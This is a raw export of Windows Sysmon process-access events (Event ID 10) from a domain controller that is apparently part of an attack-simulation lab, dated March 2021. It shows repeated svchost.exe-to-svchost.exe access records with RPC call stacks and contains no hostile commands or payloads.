10341000x80000000000000005565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
